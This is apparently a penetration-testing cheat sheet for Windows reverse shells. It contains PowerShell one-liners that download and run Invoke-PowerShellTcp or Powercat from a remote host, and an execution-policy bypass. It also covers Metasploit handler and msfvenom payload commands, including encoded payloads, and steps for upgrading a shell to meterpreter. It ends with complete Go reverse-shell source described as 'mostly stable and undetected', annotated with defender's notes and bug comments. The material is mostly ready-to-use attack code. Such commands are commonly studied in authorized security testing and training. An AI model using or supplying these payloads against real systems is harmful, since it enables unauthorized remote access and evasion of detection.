
Stabilization

:: In Windows we can use rlwrap before Connecting to the Target Machine
rlwrap nc -nvlp <PORT>

CMD - PSH

Invoke-PowerShellTcp  Powercat

# [Invoke-PowerShellTcp] Download - Execute 
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');" "Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

# [Powercat] Download - Execute
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Powercat.ps1');" "Powercat -c IP -p PORT -e cmd"
:: [Invoke-PowerShellTcp] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

:: [Powercat] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Powercat.ps1;Powercat -c IP -p PORT -e cmd"

Interface

:: Enable Unicode Characters
chcp 65001

:: Set Keyboard Layout
Set-WinUserLanguageList -LanguageList us-US -force

Metasploit

:: Catching a Reverse Shell
:: Load the Module
use exploit/multi/handler

:: Parameters
set LHOST
set LPORT

:: Set the Correct PAYLOAD
set PAYLOAD windows/shell/reverse_tcp

PAYLOADS

:: Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP
msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP Encoded
msfvenom -p windows/shell/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

Upgrading To Meterpreter

It May Be Necessary To Run The Commands Multiple Times Before Succeeding
:: Background the SHELL: [CTRL+Z]
:: Provide the Session Number
sessions -u SESSION
:: Background the SHELL: [CTRL+Z]
:: Load the Module
use multi/manage/shell_to_meterpreter

:: Provide the Session Number
:: [Method 1]
run session=SESSION

:: [Method 2]
run session=SESSION win_transfer=POWERSHELL

:: [Method 3]
run session=SESSION win_transfer=VBS

GO Reverse Shell

Features Missing

Mostly Stable and Undetected. Works on Windows and Linux.


:: Build
:: This is going to Generate a Binary Named [GoRevShell.exe]
env GOOS=windows GOARCH=386 go build GoRevShell.go

:: Usage
GoRevShell.exe -i <IP> -p <PORT>

:: Catching The Shell
rlwrap nc -nvlp <PORT>
SOURCE

package main

import (
"bufio"
"flag"
"fmt"
"net"
"os"
"os/exec"
"runtime"
)

// execute maps one received line to the shell invocation used to run it.
// It returns the interpreter and its argument list: ("cmd", ["/C", msg])
// on Windows, ("/bin/bash", ["-c", msg]) on Linux. On any other GOOS it
// prints a message to stdout and returns an empty interpreter name with
// ["-c", msg], which the caller will then fail to exec.
//
// From a detection standpoint the visible pattern is one short-lived
// `cmd /C <line>` or `/bin/bash -c <line>` child per received line.
func execute(msg string) (string, []string) {
	var shell, shellFlag string
	switch runtime.GOOS {
	case "windows":
		shell, shellFlag = "cmd", "/C"
	case "linux":
		shell, shellFlag = "/bin/bash", "-c"
	default:
		// Same message and same fall-through as the original: no exit here.
		fmt.Println("Unknown Arch. Terminating.")
		shellFlag = "-c"
	}
	return shell, []string{shellFlag, msg}
}

// main parses -i/-p, dials the given host:port over plain TCP and then
// loops forever: it sends a "<cwd>> " prompt, reads one line from the
// connection, runs it through execute and writes the command output back.
//
// Defender's notes, limited to what this listing shows:
//   - the transport is unencrypted TCP (net.Dial "tcp"), so the prompt
//     text, every command line and every output are visible on the wire;
//   - each received line is a new child process created by exec.Command
//     in the loop, i.e. a burst of short-lived cmd /C or /bin/bash -c
//     children whose parent is this binary.
func main() {
args := os.Args
// Only the presence of some argument is checked; the flag values are not
// validated, so an empty -i/-p still reaches net.Dial below.
if len(args) < 2 {
fmt.Println("Usage: [OPTIONS]\n\n GO Reverse Shell\n\nOptions:\n -i HOST -p PORT")
return
}

I_P := flag.String("i", "", "HOST")
L_PORT := flag.String("p", "", "PORT")
flag.Parse()

// The Dial error is discarded. When Dial fails conn is a nil net.Conn and
// the first Fprintf in the loop panics instead of reporting the failure;
// conn is also never closed on any path.
conn, _ := net.Dial("tcp", fmt.Sprintf("%s:%s", *I_P, *L_PORT))
for {
cwd, _ := os.Getwd()
fmt.Fprintf(conn, "\n%s> ", cwd)
// A fresh bufio.Reader is built on every iteration, so any bytes it
// buffered past the first newline are dropped with it. The read error is
// ignored as well: once the peer disconnects, msg is "" and the loop keeps
// spinning, creating a child process per iteration — presumably a very
// noisy process-creation pattern (how the shell treats an empty command
// line is not shown here).
msg, _ := bufio.NewReader(conn).ReadString('\n')
exe, args := execute(msg)
out, err := exec.Command(exe, args...).Output()
if err != nil {
// NOTE(review): this is Println, not Fprintf — conn, the literal format
// string and err are printed to the process's own stdout (go vet flags
// the unexpanded %s); nothing is written to the connection on this path.
fmt.Println(conn, "\n\n%s\n", err)
}
fmt.Fprintf(conn, "%s", out)
}
}